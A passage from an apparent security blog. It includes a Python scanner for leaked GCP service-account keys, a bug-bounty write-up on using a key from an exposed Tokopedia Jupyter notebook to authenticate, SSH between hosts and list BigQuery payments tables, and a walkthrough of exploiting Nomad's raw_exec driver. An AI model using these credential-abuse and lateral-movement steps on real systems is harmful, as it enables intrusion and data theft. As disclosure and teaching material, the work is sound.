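# A key pasted into a traceback or log: the JSON is flat, so no nested braces.
JSON_RUN = re.compile(r'\{[^{}]*"type"\s*:\s*"service_account"[^{}]*\}', re.DOTALL)
# A base64 copy: a long run of base64 alphabet with optional padding.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{100,}={0,2}")


def _maybe_b64decode(blob: str) -> Optional[str]:
    """Decoded text if blob is valid base64 that decodes to UTF-8, else None."""
    compact = "".join(blob.split())  # tolerate wrapped lines
    try:
        return base64.b64decode(compact, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def parse_sa_key(blob: str) -> Optional[dict]:
    """Return owner-identifying metadata if blob is a service-account key."""
    candidates = [blob]
    decoded = _maybe_b64decode(blob)
    if decoded is not None:
        candidates.append(decoded)
    for text in candidates:
        try:
            data = json.loads(text)
        except ValueError:
            continue
        if not isinstance(data, dict) or data.get("type") != "service_account":
            continue
        if not all(k in data for k in REQUIRED):
            continue
        if not str(data["private_key"]).startswith("-----BEGIN PRIVATE KEY-----"):
            continue
        return {
            "project_id": data["project_id"],          # which GCP project
            "client_email": data["client_email"],      # which service account
            "private_key_id": data["private_key_id"],  # what the owner must revoke
            "encoded": text is not blob,               # True if base64 wrapped
        }
    return None


def find_sa_keys(text: str) -> List[dict]:
    """Scan free text (a traceback, a saved .ipynb, a log) for keys."""
    found: List[dict] = []
    seen = set()
    for pattern in (JSON_RUN, B64_RUN):
        for match in pattern.finditer(text):
            meta = parse_sa_key(match.group(0))
            if meta and meta["private_key_id"] not in seen:
                seen.add(meta["private_key_id"])
                found.append(meta)
    return found


# Constructed sample: the shape of a real key file with a dummy private key.
SAMPLE_KEY = json.dumps({
    "type": "service_account",
    "project_id": "example-project-000",
    "private_key_id": "0123456789abcdef0123456789abcdef01234567",
    "private_key": "-----BEGIN PRIVATE KEY-----\nMIIEvQIBADANBgkq...placeholder...\n-----END PRIVATE KEY-----\n",
    "client_email": "notebook-sa@example-project-000.iam.gserviceaccount.com",
    "client_id": "100000000000000000000",
    "token_uri": "https://oauth2.googleapis.com/token",
})
SAMPLE_B64 = base64.b64encode(SAMPLE_KEY.encode()).decode()
# Constructed notebook traceback that echoes the key, as in the screenshot above.
SAMPLE_TRACEBACK = (
    "Traceback (most recent call last):\n"
    '  File "<ipython-input-3>", line 2, in <module>\n'
    "    creds = service_account.Credentials.from_service_account_info(info)\n"
    "ValueError: could not load credentials: " + SAMPLE_KEY + "\n"
)

if __name__ == "__main__":
    print(parse_sa_key(SAMPLE_B64))
    print(find_sa_keys(SAMPLE_TRACEBACK))
```

For a real find, project_id and client_email tell you whose program to report to and private_key_id is what the owner needs to delete; to prove impact with the key file itself, <i>gcloud auth activate-service-account --key-file=&lt;file&gt;</i> is the standard way to authenticate as that account before the listing shown further down.<br />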
I had used the terminal to do some basic poking around to find the owner<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7FWyY-hPD5RDfZ-87y8IBiM5cBtkZUlonSvjzy4H_FfQLUZL3Sum-hLHEckr8HtGm8_S0_rxu_WtrzD6Qf-o49mLoTx75KACn9fOe0VUVOuND8d1BQcGGRIc5q4Qnv3ZtZWTW0BfPW0s/s1600/uname-a-tokepedia-jupyter.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="283" data-original-width="1600" height="112" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7FWyY-hPD5RDfZ-87y8IBiM5cBtkZUlonSvjzy4H_FfQLUZL3Sum-hLHEckr8HtGm8_S0_rxu_WtrzD6Qf-o49mLoTx75KACn9fOe0VUVOuND8d1BQcGGRIc5q4Qnv3ZtZWTW0BfPW0s/s640/uname-a-tokepedia-jupyter.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1guzNQwRxBHKVGUnm8N88HWhqLhF7oNAvOLJoqONXTtQ3Gq8HdnSjuw6ZHyteWQuPXjqw3VK4DNcBzJMTfJ-j962LfOzJxFk6dPd2TOSndAHcVNAl3osDrASfTt1Rrzh92TK_7chxUy4/s1600/creds-via-jupyter.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1022" data-original-width="1600" height="408" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1guzNQwRxBHKVGUnm8N88HWhqLhF7oNAvOLJoqONXTtQ3Gq8HdnSjuw6ZHyteWQuPXjqw3VK4DNcBzJMTfJ-j962LfOzJxFk6dPd2TOSndAHcVNAl3osDrASfTt1Rrzh92TK_7chxUy4/s640/creds-via-jupyter.png" width="640" /></a></div>
<span id="goog_513689851"></span><span id="goog_513689852"></span><br />
Once I identified it was owned by someone with a bug bounty program I figured it was ok to prove access and impact.<br />
<br />
Per the earlier GCP post, once you have the service account key you authenticate as that service account and can then interact with whatever services the account has access to, in this case listing the project's compute instances:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAm9S5leVr9SYE66HVrk31CDcCwQuwxhk6dyk-Ou6ueriO8N4_H81bXmAvJ6o9T5hmu5BUwSWBVM0jAR-WHP_KiAVKocERcwCyJthdmsAM6LPeKbwo1w7YMD8fYaJ2QTrQAplIHRHKvqE/s1600/tokepedia-gcp-compute-list.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="269" data-original-width="1600" height="106" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAm9S5leVr9SYE66HVrk31CDcCwQuwxhk6dyk-Ou6ueriO8N4_H81bXmAvJ6o9T5hmu5BUwSWBVM0jAR-WHP_KiAVKocERcwCyJthdmsAM6LPeKbwo1w7YMD8fYaJ2QTrQAplIHRHKvqE/s640/tokepedia-gcp-compute-list.png" width="640" /></a></div>
<br />
The handy thing about getting a shell on a GCP compute host is that the gcloud tooling is already installed and "just works" (on GCE, gcloud picks up credentials for the instance's attached service account from the metadata server). I didn't actually need to do anything from an external host; I was able to start SSHing to other hosts from within the Jupyter terminal.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_4G7yZi8lC7J0g5H7NzD7Bnn9jhzHyKxTkYKNzr-WSyAC2a37TxjN5v8o-12v7az9bo1iKyrWt-RK5fYXuA47aY90i8pQMa59_tuaT9zBRZ4WZgxQ6xbJRlQPYAeUyvC7XkaGaRABS9Y/s1600/ssh+to+seonper-1-from-jupyter.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="952" data-original-width="1600" height="380" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_4G7yZi8lC7J0g5H7NzD7Bnn9jhzHyKxTkYKNzr-WSyAC2a37TxjN5v8o-12v7az9bo1iKyrWt-RK5fYXuA47aY90i8pQMa59_tuaT9zBRZ4WZgxQ6xbJRlQPYAeUyvC7XkaGaRABS9Y/s640/ssh+to+seonper-1-from-jupyter.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigGLUpBY9W5kOLTNEu9m6rIt4OfkbMDv2HkshHgL6Nl3-StogRP2bwpGJx-CSG2wRHZVAZG9mgRmzC7BZUDSauYkmYVmkjgfNIjSXpFEi1nD8UgezGAzxaWlsGH4BMJCkMR7J8WJ2zCfA/s1600/ssh+to+seonper-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="552" data-original-width="1590" height="222" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigGLUpBY9W5kOLTNEu9m6rIt4OfkbMDv2HkshHgL6Nl3-StogRP2bwpGJx-CSG2wRHZVAZG9mgRmzC7BZUDSauYkmYVmkjgfNIjSXpFEi1nD8UgezGAzxaWlsGH4BMJCkMR7J8WJ2zCfA/s640/ssh+to+seonper-1.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXL_ObVY1nk5uX_eUSb1uOU6VAhIQXNlPOK-rrFVfY3LaHaTHK7HBFdpcB0QCQ2X780dj0WgyIMphUFmiWJgCr_Gtvr2vyDwyx9hw-CAIP2fBlfNfM5VSWnT3cyVQn-M_7S9q5obsr15w/s1600/ssh-abe-mf-1-from-jupyter.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="968" data-original-width="1600" height="386" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXL_ObVY1nk5uX_eUSb1uOU6VAhIQXNlPOK-rrFVfY3LaHaTHK7HBFdpcB0QCQ2X780dj0WgyIMphUFmiWJgCr_Gtvr2vyDwyx9hw-CAIP2fBlfNfM5VSWnT3cyVQn-M_7S9q5obsr15w/s640/ssh-abe-mf-1-from-jupyter.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNTfIv1AjnysH06UfkJ6H2EHaajz3QtLVRXafyaDyl2Pq3V4fMBjFquWJy3K010ccfePAoox9AK0vn1fXJI1MryJhBji1TdXqKIXEzbum1TEuF4JT4iJiP1UoprSSMlWFhyphenhyphenRjxapvne4Q/s1600/cat+bash_history+on+ab-md-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="962" data-original-width="1600" height="384" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNTfIv1AjnysH06UfkJ6H2EHaajz3QtLVRXafyaDyl2Pq3V4fMBjFquWJy3K010ccfePAoox9AK0vn1fXJI1MryJhBji1TdXqKIXEzbum1TEuF4JT4iJiP1UoprSSMlWFhyphenhyphenRjxapvne4Q/s640/cat+bash_history+on+ab-md-1.png" width="640" /></a></div>
<br />
Bigquery tables o_0<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">[+] Bigquery access [+]</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">bq ls --format=prettyjson --project_id tokopedia-970</span><br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhs26OVfvWTagWd6XkF40lnb13jbUNMBTvSbCcbgtzo6g9ijqjxoKaL9yUgIpA5x2kXA2QxcixSBtFouSALOhlMJMrhpmHj6UkyhnpFQjMDNotTH4tke5xUeSTFy9au0jbdGPe2QlUjGc0/s1600/Screen+Shot+2020-03-13+at+10.23.35+PM.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="724" data-original-width="998" height="232" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhs26OVfvWTagWd6XkF40lnb13jbUNMBTvSbCcbgtzo6g9ijqjxoKaL9yUgIpA5x2kXA2QxcixSBtFouSALOhlMJMrhpmHj6UkyhnpFQjMDNotTH4tke5xUeSTFy9au0jbdGPe2QlUjGc0/s320/Screen+Shot+2020-03-13+at+10.23.35+PM.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Dat billing table yo</td></tr>
</tbody></table>
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEju2aPLTBgI0XIX99e7qOoJb3ffho76zC3SLWYwT1KAOb3M0x6pjovZOnB-q18ZbIxL6mBo57QTOkEgZ9DzqpKjL8YIa6gZwOZdmRWQd7HZQ4eNLhQbw2fAo4CujLzWgyhysSHiBJybsGQ/s1600/Screen+Shot+2020-03-13+at+10.23.57+PM.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="728" data-original-width="1230" height="189" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEju2aPLTBgI0XIX99e7qOoJb3ffho76zC3SLWYwT1KAOb3M0x6pjovZOnB-q18ZbIxL6mBo57QTOkEgZ9DzqpKjL8YIa6gZwOZdmRWQd7HZQ4eNLhQbw2fAo4CujLzWgyhysSHiBJybsGQ/s320/Screen+Shot+2020-03-13+at+10.23.57+PM.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">I love payments tables</td></tr>
</tbody></table>
<br />
<div>
<br />
Along the way I searched for who this company was. <a href="https://en.wikipedia.org/wiki/Tokopedia">https://en.wikipedia.org/wiki/Tokopedia</a></div>
<div>
<br /></div>
<div>
Most interestingly...</div>
<div>
<br /></div>
<blockquote class="tr_bq">
<span style="background-color: white; color: #222222; font-family: sans-serif;">In 2017, Tokopedia received $1.1 billion investment from Chinese e-commerce giant Alibaba.</span><sup class="reference" id="cite_ref-7" style="background-color: white; color: #222222; font-family: sans-serif; line-height: 1; unicode-bidi: isolate; white-space: nowrap;"><a href="https://en.wikipedia.org/wiki/Tokopedia#cite_note-7" style="background: none; color: #0b0080; text-decoration-line: none;">[7]</a></sup><span style="background-color: white; color: #222222; font-family: sans-serif;"> Again in 2018, the company secured $1.1 billion funding round led by Chinese e-commerce giant </span><a href="https://en.wikipedia.org/wiki/Alibaba_Group" style="background: none rgb(255, 255, 255); color: #0b0080; font-family: sans-serif; text-decoration-line: none;" title="Alibaba Group">Alibaba Group</a><span style="background-color: white; color: #222222; font-family: sans-serif;"> Holding and Japan's </span><a class="mw-redirect" href="https://en.wikipedia.org/wiki/SoftBank" style="background: none rgb(255, 255, 255); color: #0b0080; font-family: sans-serif; text-decoration-line: none;" title="SoftBank">SoftBank</a><span style="background-color: white; color: #222222; font-family: sans-serif;"> Group</span><sup class="reference" id="cite_ref-8" style="background-color: white; color: #222222; font-family: sans-serif; line-height: 1; unicode-bidi: isolate; white-space: nowrap;"><a href="https://en.wikipedia.org/wiki/Tokopedia#cite_note-8" style="background: none; color: #0b0080; text-decoration-line: none;">[8]</a></sup><span style="background-color: white; color: #222222; font-family: sans-serif;"> putting its valuation to about $7B.</span><sup class="reference" id="cite_ref-9" style="background-color: white; color: #222222; font-family: sans-serif; line-height: 1; unicode-bidi: isolate; white-space: nowrap;"><a href="https://en.wikipedia.org/wiki/Tokopedia#cite_note-9" style="background: none; 
color: #0b0080; text-decoration-line: none;">[9]</a></sup></blockquote>
So, being a good person (tm), I reported the issue and it was assigned a critical severity. They fixed it super quickly and the team was decently responsive until it was fixed. After that it took 2 weeks to get information on the bounty; I promptly provided payment info, but I was never paid and they have stopped responding to my inquiries.<br />
<br />
<br />
<b>Solutions:</b><br />
Run in a limited privilege container (doesn't protect against cloud metadata attack)<br />
<br />
New versions of Jupyter notebook allow for password protecting access. Do that instead of leaving it open to everyone.<br />
<br />
Devoops: Nomad with raw_exec enabled (2019-12-16)<br />
<br />
"Nomad is a flexible container orchestration tool that enables an organization to
easily deploy and manage any containerized or legacy application using a single,
unified workflow. Nomad can run a diverse workload of Docker, non-containerized,
microservice, and batch applications, and generally offers the following benefits
to developers and operators..."<br />
<br />
from: <a href="https://www.nomadproject.io/intro/index.html" target="_blank">https://www.nomadproject.io/intro/index.html</a><br />
<br />
To get a feel for where it fits in the HashiCorp ecosphere take a look at the following graphic:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQ9QlLr-VtGooRSnb9nyLDGFwz34YQBvr4VW4M2STPc2-tg3B9kKyHJ_v4gcM-35fQY_zE662fTH8C1m3Ag8qbD5c9BosEaeQ65eAFIJcvhY6qdFBetT7ohPQCgzY-rkKwPuYZyZ9fEsY/s1600/Screen+Shot+2018-12-18+at+10.57.58+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="534" data-original-width="1600" height="132" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQ9QlLr-VtGooRSnb9nyLDGFwz34YQBvr4VW4M2STPc2-tg3B9kKyHJ_v4gcM-35fQY_zE662fTH8C1m3Ag8qbD5c9BosEaeQ65eAFIJcvhY6qdFBetT7ohPQCgzY-rkKwPuYZyZ9fEsY/s400/Screen+Shot+2018-12-18+at+10.57.58+AM.png" width="400" /></a></div>
<br />
I'd like to thank <a href="https://twitter.com/willbtlr" target="_blank">Will Butler</a> for letting me write this up after watching him pwn it.<br />
<br />
You can get a dev environment up and running using the tutorial here:<br />
<a href="https://www.nomadproject.io/intro/getting-started/install.html" target="_blank">https://www.nomadproject.io/intro/getting-started/install.html</a><br />
<br />
The walkthrough has you run it as a dev environment, which won't bind to 0.0.0.0, so you'll need the following server and client files to get an appropriate environment up and running after you Vagrant up.<br />
<br />
server: <a href="https://gist.github.com/carnal0wnage/ce4296137414bd16fcca0818208b39b7" target="_blank">https://gist.github.com/carnal0wnage/ce4296137414bd16fcca0818208b39b7</a><br />
client1: <a href="https://gist.github.com/carnal0wnage/4abde0ee31f4d730019e6fa04ef6d3b6" target="_blank">https://gist.github.com/carnal0wnage/4abde0ee31f4d730019e6fa04ef6d3b6</a><br />
client2: <a href="https://gist.github.com/carnal0wnage/a4399019a943862e57283c29994ce5da" target="_blank">https://gist.github.com/carnal0wnage/a4399019a943862e57283c29994ce5da</a><br />
<br />
If you get everything up and running correctly you should be able to connect to the UI on port 4646 and see the example job:<br />
<br />
<div class="p1">
<span class="s1">$ nomad job run example.nomad</span></div>
<div class="p1">
<span class="s1">==> Monitoring evaluation "ac9b4b08"</span></div>
<div class="p1">
<span class="s1">    Evaluation triggered by job "example"</span></div>
<div class="p1">
<span class="s1">    Evaluation within deployment: "8a7dfe0f"</span></div>
<div class="p1">
<span class="s1">    Allocation "57e65abe" created: node "a15034e5", group "cache"</span></div>
<div class="p1">
<span class="s1">    Evaluation status changed: "pending" -> "complete"</span></div>
<div class="p1">
<span class="s1">==> Evaluation "ac9b4b08" finished with status "complete"</span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOElT3HECII9VIWEIfPBE2z5JE8NVOliGSs0fOkuLL4tFbzO8faRYIdW6axFxHcr9iR_m2EJa6gIGq5opsfSkwlTbJ644dHm1AB_Sf4ORUGRB1rSuWALMLV8eYiBPMxV7XbdRJsEUEWfY/s1600/Screen+Shot+2018-12-18+at+11.10.44+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="494" data-original-width="1600" height="122" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOElT3HECII9VIWEIfPBE2z5JE8NVOliGSs0fOkuLL4tFbzO8faRYIdW6axFxHcr9iR_m2EJa6gIGq5opsfSkwlTbJ644dHm1AB_Sf4ORUGRB1rSuWALMLV8eYiBPMxV7XbdRJsEUEWfY/s400/Screen+Shot+2018-12-18+at+11.10.44+AM.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
jobs in the nomad UI</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPGjA_m2RSbEVEWM4yxZ_hXthvuE6hxafRXl6TU-onoRGFttN4jtEWpr1KUSqtjO9BvS9CORcGU6J-CgVxLBC6kGFMv5uJRZ8AUPGXTHuznstpQBSxboh28tzLCulH9O1c6wWRlamIFe4/s1600/Screen+Shot+2018-12-18+at+11.11.03+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="1600" height="120" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPGjA_m2RSbEVEWM4yxZ_hXthvuE6hxafRXl6TU-onoRGFttN4jtEWpr1KUSqtjO9BvS9CORcGU6J-CgVxLBC6kGFMv5uJRZ8AUPGXTHuznstpQBSxboh28tzLCulH9O1c6wWRlamIFe4/s400/Screen+Shot+2018-12-18+at+11.11.03+AM.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
servers in the nomad UI</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMc-N-WTmCYi_Oix_7t5Lg4HME1syM1TdMQyQWQ1Q4AgPT0kZIiaQcbDl6Yylw2ZFGVQAJzcEkC_c5ziktyWKABv16uQIjgXem5SdRQbJGYxsRmoc2R-f4oNpWeCBupWZiU0_Qv2RoLCI/s1600/Screen+Shot+2018-12-18+at+11.10.56+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="490" data-original-width="1600" height="121" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMc-N-WTmCYi_Oix_7t5Lg4HME1syM1TdMQyQWQ1Q4AgPT0kZIiaQcbDl6Yylw2ZFGVQAJzcEkC_c5ziktyWKABv16uQIjgXem5SdRQbJGYxsRmoc2R-f4oNpWeCBupWZiU0_Qv2RoLCI/s400/Screen+Shot+2018-12-18+at+11.10.56+AM.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
clients in the nomad UI</div>
<div class="separator" style="clear: both; text-align: center;">
<span style="text-align: left;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="text-align: left;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="text-align: left;">Leveraging misconfiguration time. Nomad ships with a raw_exec option that is disabled by default.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
ref: <a href="https://www.nomadproject.io/docs/drivers/raw_exec.html" target="_blank">https://www.nomadproject.io/docs/drivers/raw_exec.html</a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The raw_exec option allows you to run a command outside isolation on the Nomad host. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
"The <code>raw_exec</code> driver can run on all supported operating systems. For security
reasons, it is disabled by default. To enable raw exec, the Nomad client
configuration must explicitly enable the <code>raw_exec</code> driver in the client's
<a href="https://www.nomadproject.io/docs/configuration/client.html#options" target="_blank">options</a>:"</div>
<br />
How can you see if the raw_exec module is enabled on the clients?<br />
<br />
You can check it out in the UI:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsZ8YIeTGgA4cZsvq_f_u4YB3bS4comJYJWlwN7v-ZzEeY6jjQLVePRo66fIEGD2wdwodrtooFzb1zD7A4fMFn2-Qya-jXkqHtLIpvN29TjsroA2b0znj7eWJez7CGN5k3OZ8kEVXGqxY/s1600/Screen+Shot+2018-12-18+at+11.16.07+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="940" data-original-width="1600" height="233" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsZ8YIeTGgA4cZsvq_f_u4YB3bS4comJYJWlwN7v-ZzEeY6jjQLVePRo66fIEGD2wdwodrtooFzb1zD7A4fMFn2-Qya-jXkqHtLIpvN29TjsroA2b0znj7eWJez7CGN5k3OZ8kEVXGqxY/s400/Screen+Shot+2018-12-18+at+11.16.07+AM.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
or by hitting the API endpoint:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoGOt8gFdkDovoE9iR2PRZqOX8HZFz8NF8GDV9T-w0czFmxZ1BUGViZkoaqFqw1k_0U3bhELzSAppnqR2koKq4IG8uDh-JmZhE2REfG7nHxNgheHMng20K71CRcuwm2rygi9S-X2X0xn8/s1600/Screen+Shot+2018-12-18+at+11.19.58+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="730" data-original-width="1600" height="181" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoGOt8gFdkDovoE9iR2PRZqOX8HZFz8NF8GDV9T-w0czFmxZ1BUGViZkoaqFqw1k_0U3bhELzSAppnqR2koKq4IG8uDh-JmZhE2REfG7nHxNgheHMng20K71CRcuwm2rygi9S-X2X0xn8/s400/Screen+Shot+2018-12-18+at+11.19.58+AM.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Let's exploit this thing.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
We need to create a job hcl file with our commands. Here is a gist with a simple one:</div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://gist.github.com/carnal0wnage/25b391126dadefe0a9523fb421bf8f33" target="_blank">https://gist.github.com/carnal0wnage/25b391126dadefe0a9523fb421bf8f33</a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfMwq4-SuLGELxk5L_opJUNlVV5G66uTKsB6Lk29PXazpqWqNI5aqWgPBuBhpzFCFWvxQ61nNxYwrI3YY-pp1RPkxzbdU6g-G_UsJwN69kywvIr8IUNt7XLxCluzUfNIzWvRWTcodzWCo/s1600/Screen+Shot+2018-12-18+at+11.23.36+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="240" data-original-width="1600" height="94" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfMwq4-SuLGELxk5L_opJUNlVV5G66uTKsB6Lk29PXazpqWqNI5aqWgPBuBhpzFCFWvxQ61nNxYwrI3YY-pp1RPkxzbdU6g-G_UsJwN69kywvIr8IUNt7XLxCluzUfNIzWvRWTcodzWCo/s640/Screen+Shot+2018-12-18+at+11.23.36+AM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
starting the service</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrbWRhrEX7c-WdoLdbJ9e3LZofyYDrn4QOCLlttNSZLG_WVsCx3BDv-xU_K9WXG0Ac5N46MH57ik45kHlLFLvZ3kGPeggEzuu3Dx3U45r7tFBlVyexbRMvMekoSdh8sZ-FCN7qu9o_eQ4/s1600/Screen+Shot+2018-12-18+at+11.23.56+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="178" data-original-width="1426" height="78" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrbWRhrEX7c-WdoLdbJ9e3LZofyYDrn4QOCLlttNSZLG_WVsCx3BDv-xU_K9WXG0Ac5N46MH57ik45kHlLFLvZ3kGPeggEzuu3Dx3U45r7tFBlVyexbRMvMekoSdh8sZ-FCN7qu9o_eQ4/s640/Screen+Shot+2018-12-18+at+11.23.56+AM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
Results of our job</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-p7jHQ0RwgfdKGlrR8V6EmUmSolkfktMbqhzyhez76pBvlyTbW1SW7Dlk5C4X2-HEhv5IOFsMPKJmRtLPN2bOCSMUrYl2KVmbcTu7wOWJfguwwyIw6qoxZ4dxPDxURQVOp6AXCV-APok/s1600/Screen+Shot+2018-12-18+at+11.26.22+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="348" data-original-width="1600" height="86" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-p7jHQ0RwgfdKGlrR8V6EmUmSolkfktMbqhzyhez76pBvlyTbW1SW7Dlk5C4X2-HEhv5IOFsMPKJmRtLPN2bOCSMUrYl2KVmbcTu7wOWJfguwwyIw6qoxZ4dxPDxURQVOp6AXCV-APok/s400/Screen+Shot+2018-12-18+at+11.26.22+AM.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
job in the UI</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
